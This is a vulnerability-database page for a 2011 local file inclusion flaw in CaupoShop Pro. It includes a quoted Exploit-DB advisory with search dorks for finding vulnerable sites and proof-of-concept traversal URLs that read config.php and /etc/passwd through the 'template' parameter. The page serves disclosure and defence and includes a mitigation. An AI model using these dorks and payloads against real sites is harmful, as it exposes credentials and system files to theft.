CaupoShop Pro (2.x/ - exploit.company

vendor:

CaupoShop Pro

by:

Rami Salama

7.5

CVSS

HIGH

Local File Include

CWE

Product Name: CaupoShop Pro

Affected Version From: 2.x

Affected Version To: 3.7

Patch Exists: NO

Related CWE: N/A

CPE: a:caupo:cauposhop_pro

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2011

CaupoShop Pro (2.x/ <= 3.70) Local File Include Vulnerability

CaupoShop Pro (2.x/ <= 3.70) is vulnerable to a Local File Include vulnerability. This vulnerability allows an attacker to include a local file, usually through a script on the web server. An attacker can exploit this vulnerability by manipulating the 'template' parameter in a malicious URL request to the vulnerable CaupoShop Pro application. This can allow an attacker to view sensitive files on the web server, such as configuration files containing database usernames and passwords.

Mitigation:

To mitigate this vulnerability, ensure that user input is properly sanitized and validated. Additionally, ensure that the web server is configured to deny access to sensitive files.

Source

Exploit-DB raw data:

CaupoShop Pro (2.x/ <= 3.70) Local File Include Vulnerability
-----------------------------------------------------------------------------------------
# Vuln Softwares :     	CaupoShop Pro 2.x
	     	CaupoShop Classic 3.01 
	     	CaupoShop Pro 3.70
# Discovered By :	 Rami Salama
#Contact :		eng.ramisalama_[at]_gmail_[dot]_com
# Vendor  : 	http://www.caupo.net
# Greets To : 	All my colleagues and friends in MCIT scholarship at Raya Academy
#Dorks : 		"powered by CaupoShop"
	  	 inurl:index.php?action=template&template

#Exploit  : 		http://127.0.0.1/[CaupoShop]/index.php?action=template&template=[LFI]
#POC :		http://127.0.0.1/[CaupoShop]/index.php?action=template&template=../../../config.php
	  	http://127.0.0.1/[CaupoShop]/index.php?action=template&template=../../../../../../etc/passwd

#28 October 2011 - Egypt